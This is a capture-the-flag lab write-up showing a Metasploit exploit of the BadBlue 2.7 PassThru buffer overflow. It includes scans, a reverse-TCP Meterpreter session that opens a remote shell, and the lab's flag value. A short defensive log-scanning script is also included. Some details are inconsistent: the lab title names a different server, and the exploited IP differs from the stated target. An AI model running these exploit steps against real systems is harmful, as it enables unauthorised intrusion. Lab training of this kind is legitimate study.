Vulnerability Research Lab

```
Target IP Address: 10.4.31.112
```
```
nmap -sV 10.4.31.112
PORT      STATE SERVICE            VERSION
80/tcp    open  http               BadBlue httpd 2.7
135/tcp   open  msrpc              Microsoft Windows RPC
139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds       Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp  open  ssl/ms-wbt-server?
49152/tcp open  msrpc              Microsoft Windows RPC
49153/tcp open  msrpc              Microsoft Windows RPC
49154/tcp open  msrpc              Microsoft Windows RPC
49155/tcp open  msrpc              Microsoft Windows RPC
49156/tcp open  msrpc              Microsoft Windows RPC
49163/tcp open  msrpc              Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
```
```
10.4.31.112/ext.dll?mfcisapicommand=loadpage&page=index.htx
```
Search for:

```
badblue 2.7 cve
```
A stack-based buffer overflow in the PassThru functionality of ext.dll in BadBlue 2.72b and earlier allows remote attackers to execute arbitrary code via a long query string.
Search Exploit Database for badblue 2.7 and click BadBlue 2.72b - PassThru Buffer Overflow (Metasploit).
Alternatively, look at the manual exploit BadBlue 2.72 - PassThru Remote Buffer Overflow.
```
msfconsole
search badblue 2.7
use exploit/windows/http/badblue_passthru
info
set payload windows/meterpreter/reverse_tcp
set rhosts 10.4.31.112
ip a
set lhost eth1
show options
run
meterpreter > sysinfo
```
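A defender-side check that follows from the description above (the overflow is reached through a long query string sent to ext.dll): this is an added example, not part of the original write-up or of BadBlue, that scans web-server access-log lines for requests to ext.dll whose query string is far longer than the normal loadpage request. The Common Log Format, the sample lines and the 256-byte threshold are assumptions for illustration.

```python
import re
from urllib.parse import urlsplit

# Alert threshold: an assumption for this example. The normal loadpage request
# shown above carries a ~40-byte query string; legitimate templates stay short.
MAX_QUERY_LEN = 256

# Common Log Format request lines (format assumed for this example).
CLF_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

def parse_clf(line):
    """Return the fields of one CLF line, or None if it does not match."""
    m = CLF_RE.match(line)
    return m.groupdict() if m else None

def is_suspicious_ext_dll(target, max_query_len=MAX_QUERY_LEN):
    """True if the request hits ext.dll with an oversized query string."""
    parts = urlsplit(target)
    return parts.path.lower().endswith("/ext.dll") and len(parts.query) > max_query_len

def find_suspicious(log_text, max_query_len=MAX_QUERY_LEN):
    """Return (ip, timestamp, query_len) for each line that trips the check."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_clf(line)
        if rec and is_suspicious_ext_dll(rec["target"], max_query_len):
            hits.append((rec["ip"], rec["ts"], len(urlsplit(rec["target"]).query)))
    return hits

# Constructed sample: one benign loadpage request, one oversized query
# (600 filler bytes), one unrelated static file.
SAMPLE_LOG = "\n".join([
    '10.10.21.8 - - [29/Aug/2022:16:55:20 +0530] '
    '"GET /ext.dll?mfcisapicommand=loadpage&page=index.htx HTTP/1.1" 200 4321',
    '10.10.21.8 - - [29/Aug/2022:16:55:27 +0530] '
    '"GET /ext.dll?mfcisapicommand=loadpage&page=' + "A" * 600 + ' HTTP/1.1" 200 0',
    '10.10.21.8 - - [29/Aug/2022:16:55:28 +0530] '
    '"GET /images/logo.gif HTTP/1.1" 200 1532',
])

if __name__ == "__main__":
    for ip, ts, qlen in find_suspicious(SAMPLE_LOG):
        print(f"{ts} {ip} oversized ext.dll query ({qlen} bytes)")
```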
Windows: Easy File Sharing Server
Overview
A Kali GUI machine and a target machine running a vulnerable easy file sharing server are provided to you. The IP address of the target machine is provided in a text file named target placed on the Desktop of the Kali machine (/root/Desktop/target).
Your task is to fingerprint the application using the tools available on the Kali machine and then exploit the application using the appropriate Metasploit module.
Objective: Exploit the application and retrieve the flag!
Instructions:
- Your Kali machine has an interface with IP address 10.10.X.Y. Run "ip addr" to find the values of X and Y.
- The IP address of the target machine is given in the file "/root/Desktop/target".
- Do not attack the gateways located at IP addresses 192.V.W.1 and 10.10.X.1.
My own approach
```
Target IP Address : 10.0.20.210
```
```
root@attackdefense:~# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
2: ip_vti0@NONE: <NOARP> mtu 1480 qdisc noop state DOWN group default qlen 1000
    link/ipip 0.0.0.0 brd 0.0.0.0
32780: eth0@if32781: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
    link/ether 02:42:0a:01:00:0a brd ff:ff:ff:ff:ff:ff link-netnsid 0
    inet 10.1.0.10/16 brd 10.1.255.255 scope global eth0
       valid_lft forever preferred_lft forever
32782: eth1@if32783: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
    link/ether 02:42:0a:0a:15:05 brd ff:ff:ff:ff:ff:ff link-netnsid 0
    inet 10.10.21.5/24 brd 10.10.21.255 scope global eth1
       valid_lft forever preferred_lft forever
```
```
root@attackdefense:~# nmap 10.0.20.210
Starting Nmap 7.70 ( https://nmap.org ) at 2022-08-29 14:55 IST
Nmap scan report for 10.0.20.210
Host is up (0.0036s latency).
Not shown: 990 closed ports
PORT      STATE SERVICE
80/tcp    open  http
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
3389/tcp  open  ms-wbt-server
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49175/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 5.71 seconds
```
An HTTP service is running on TCP port 80; the version is BadBlue httpd 2.7.
```
root@attackdefense:~# nmap 10.0.20.210 -sV
Starting Nmap 7.70 ( https://nmap.org ) at 2022-08-29 14:56 IST
Nmap scan report for 10.0.20.210
Host is up (0.0036s latency).
Not shown: 990 closed ports
PORT      STATE SERVICE            VERSION
80/tcp    open  http               BadBlue httpd 2.7
135/tcp   open  msrpc              Microsoft Windows RPC
139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds       Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp  open  ssl/ms-wbt-server?
49152/tcp open  msrpc              Microsoft Windows RPC
49153/tcp open  msrpc              Microsoft Windows RPC
49154/tcp open  msrpc              Microsoft Windows RPC
49155/tcp open  msrpc              Microsoft Windows RPC
49175/tcp open  msrpc              Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 77.53 seconds
```
BadBlue 2.72b PassThru Buffer Overflow
```
http://10.0.20.210/ext.dll?mfcisapicommand=loadpage&page=index.htx
```
```
root@attackdefense:~# searchsploit badblue 2.7
------------------------------------------------------------ ----------------------------------------
 Exploit Title                                              |  Path
                                                            | (/usr/share/exploitdb/)
------------------------------------------------------------ ----------------------------------------
BadBlue 2.72 - PassThru Remote Buffer Overflow              | exploits/windows/remote/4784.pl
BadBlue 2.72b - Multiple Vulnerabilities                    | exploits/windows/remote/4715.txt
BadBlue 2.72b - PassThru Buffer Overflow (Metasploit)       | exploits/windows/remote/16806.rb
Working Resources BadBlue 1.2.7 - Denial of Service         | exploits/windows/dos/20641.txt
Working Resources BadBlue 1.2.7 - Full Path Disclosure      | exploits/windows/remote/20640.txt
------------------------------------------------------------ ----------------------------------------
Shellcodes: No Result
Papers: No Result
```
```
msf5 > use exploit/windows/http/badblue_passthru
msf5 exploit(windows/http/badblue_passthru) > show options

Module options (exploit/windows/http/badblue_passthru):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    80               yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   VHOST                     no        HTTP server virtual host

Exploit target:

   Id  Name
   --  ----
   0   BadBlue EE 2.7 Universal

msf5 exploit(windows/http/badblue_passthru) > set rhosts 10.0.28.107
rhosts => 10.0.28.107
msf5 exploit(windows/http/badblue_passthru) > ip a
[*] exec: ip a

1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
2: ip_vti0@NONE: <NOARP> mtu 1480 qdisc noop state DOWN group default qlen 1000
    link/ipip 0.0.0.0 brd 0.0.0.0
32886: eth0@if32887: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
    link/ether 02:42:0a:01:00:15 brd ff:ff:ff:ff:ff:ff link-netnsid 0
    inet 10.1.0.21/16 brd 10.1.255.255 scope global eth0
       valid_lft forever preferred_lft forever
32888: eth1@if32889: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
    link/ether 02:42:0a:0a:15:08 brd ff:ff:ff:ff:ff:ff link-netnsid 0
    inet 10.10.21.8/24 brd 10.10.21.255 scope global eth1
       valid_lft forever preferred_lft forever

msf5 exploit(windows/http/badblue_passthru) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(windows/http/badblue_passthru) > show options

Module options (exploit/windows/http/badblue_passthru):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS   10.0.28.107      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    80               yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   VHOST                     no        HTTP server virtual host

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   BadBlue EE 2.7 Universal

msf5 exploit(windows/http/badblue_passthru) > set lhost eth1
lhost => 10.10.21.8
msf5 exploit(windows/http/badblue_passthru) > exploit

[*] Started reverse TCP handler on 10.10.21.8:4444
[*] Trying target BadBlue EE 2.7 Universal...
[*] Sending stage (180291 bytes) to 10.0.28.107
[*] Meterpreter session 1 opened (10.10.21.8:4444 -> 10.0.28.107:49275) at 2022-08-29 16:55:28 +0530

meterpreter > sysinfo
Computer        : WIN-OMCNBKR66MN
OS              : Windows 2012 R2 (6.3 Build 9600).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/windows
meterpreter > search -f flag*
Found 2 results...
    c:\flag.txt (32 bytes)
    c:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\flag.txt.lnk (481 bytes)
meterpreter > cat c:\\flag.txt
70a569da306697d64fc6c19afea37d94
meterpreter > shell
Process 1616 created.
Channel 2 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Program Files (x86)\BadBlue\EE>type c:\flag.txt
type c:\flag.txt
70a569da306697d64fc6c19afea37d94
```
Solution
The solution to this lab can be found in the following manual: https://assets.ine.com/labs/ad-manuals/walkthrough-1944.pdf